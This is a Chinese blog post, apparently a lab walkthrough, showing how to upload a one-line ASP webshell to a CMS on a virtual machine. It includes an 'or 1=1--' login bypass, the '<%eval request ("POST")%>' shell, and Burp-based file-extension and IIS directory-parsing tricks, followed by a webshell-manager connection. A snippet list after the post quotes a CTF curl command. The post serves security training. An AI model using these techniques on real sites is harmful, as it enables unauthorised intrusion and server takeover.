一句话木马——上传+绕过

· 浏览次数 : 0

小编点评

**前期准备软件:** - burp - 中国蚁剑环境:酷维网站 - VM虚拟机具体操作 1. 网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic) 2. 调出属性,修改为IP 3. 用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面使用万能密码账号:admin 'or 1=1-- 密码:任意 4. 打开burpsuit,配置一下proxy(switchy omega)上传+绕过有两个方法方法 **方法一:制作一句话木马图片** - 访问上传路径 - 上传成功后台数据库也有显示这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接 **方法二:使用burp绕过** - 制作1.asp一句话木马文本输入<%eval request (\"POST\")%> 另存为在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大,要不然网站识别不了上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭访问路径:IP/bookpic/a.asp/20246215171536061.jpg

正文

前期准备

软件:burp,中国蚁剑
环境:酷维网站,VM虚拟机

具体操作

1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)
image

2.调出属性,修改为IP,应用后确定

image

3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面

使用万能密码 账号:admin 'or 1=1-- 密码:任意

进入后去添加公告里找上传点

image

4.打开burpsuit,配置一下proxy(switchy omega)


上传+绕过有两个方法

方法1

制作一句话木马图片(传前格式验证)

参考——https://blog.csdn.net/weixin_45571987/article/details/115426542

image

访问上传路径,上传成功

image

后台数据库也有显示

image

这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败

这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接


方法2

burp绕过(传后格式验证)

制作1.asp一句话木马

文本输入<%eval request ("POST")%> 另存为

image

在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大,要不然网站识别不了

image

上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭

image

image

访问路径:IP/bookpic/a.asp/20246215171536061.jpg

image

没有显示php代码说明解析成功

image

中国蚁剑连接成功

image

image

与一句话木马——上传+绕过相似的内容:

一句话木马——上传+绕过

前期准备 软件:burp,中国蚁剑 环境:酷维网站,VM虚拟机 具体操作 1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点) 2.调出属性,修改为IP,应用后确定 3.用物理机打开网站,进入admin目录,进入ht

[BUUCTF][WEB][极客大挑战 2019]Knife 1

这题几乎是送分 题目不断暗示,后台存在一句话木马 拿个蚁剑连上去就完事了 这里用curl 连上去,演示一下,理解一下其中的原理 #注意 phpinfo() 后面的分号不能省 curl -d "Syc=phpinfo();" http://32a31ff6-2815-4485-a74e-e646f67

Netcode for Entities如何添加自定义序列化,让GhostField支持任意类型?以int3为例(1.2.3版本)

一句话省流:很麻烦也很抽象,能用内置支持的类型就尽量用。 首先看文档。官方文档里一开头就列出了所有内置的支持的类型:Ghost Type Templates 其中Entity类型需要特别注意一下:在同步这个类型的时候,如果是刚刚Instantiate的Ghost(也就是GhostId尚未生效,上一篇

一句话速通银行家算法

一句话速通银行家算法: try 分配资源, if safe() then continue; else 归还资源 并且 sleep(当前任务). 好,本文结束。 hh其实并没有,接下来我将解释这句话以及银行家算法究竟是个啥。 ps: 银行家算法是try assign(), 而还有个锁的api是try

Spring源码系列:初探底层,手写Spring

在学习 Spring 框架源码时,记住一句话:源码并不难,只需要给你各种业务场景或者项目经理,你也能实现自己的 Spring。虽然你的实现可能无法与开源团队相媲美,但是你肯定可以实现一个 0.0.1 版本。因此,初次阅读源码时,不要陷入太深的细节中,先了解大体逻辑,再仔细研读。

需求变更,代码改的像辣鸡 - 论代码质量

一句注释引发的思考 接到一个有鸡毛信般的紧急需求(当然,002的需求向来是如此紧急的):大屏展示原来只有二个品牌数据,现增加到三个品牌的数据。一句话的需求,且没有业务逻辑变更,我认为可以迅雷不及掩耳之势,2小时收拾干净交差。当我满腔激情的定位的核心逻辑部分时,这样一句注释(见下图),让我顿时思绪天马

【Azure 存储服务】Azure Data Lake Storage (ADLS) Gen2 GRS Failover是否支持自动切换或者手动切换到灾备的终结点呢?

问题描述 在Azure的存储服务中,介绍灾备恢复和Storage Account故障转移的文档中,有一句话“Account failover is not supported for storage accounts with a hierarchical namespace enabled.” 而

『手撕Vue-CLI』处理不同指令

前言 在上一篇『手撕Vue-CLI』添加自定义指令中,已经实现了自定义指令的添加,但是指令还是比较简单的,只是简单的打印一句话,那么在实际运用场景中,可能会有更多的需求,比如可能需要在指令中传递参数,或者需要在指令中进行一些复杂的操作,那么这个时候我们就需要对指令进行处理了。 创建指令处理文件 在上

《最新出炉》系列初窥篇-Python+Playwright自动化测试-3-离线搭建playwright环境

1.简介 有些小伙伴或者童鞋们私信留言说自己是在公司局域网办公,或者公司为了安全对网络管控比较严格(尤其是一些大的国企、央企),总之就是一句话无法连到外网去在线下载,宏哥刚看到留言时觉得这问题还留言问啊,你找个有网的电脑下载好安装包然后安装就可以用了。(第一种情况及解决办法:带要搭建环境的电脑到有网

Composite 组合模式简介与 C# 示例【结构型3】【设计模式来了_8】

〇、简介 1、什么是组合设计模式? 一句话解释: 针对树形结构的任意节点,都实现了同一接口,他们具有相同的操作,可以通过某一操作来遍历全部节点。 组合模式通过使用树形结构来组合对象,用来表示部分以及整体层次。组合模式属于结构型模式,多用于递归。 官方意图描述:将对象组合成树形结构,以表示“部分-整体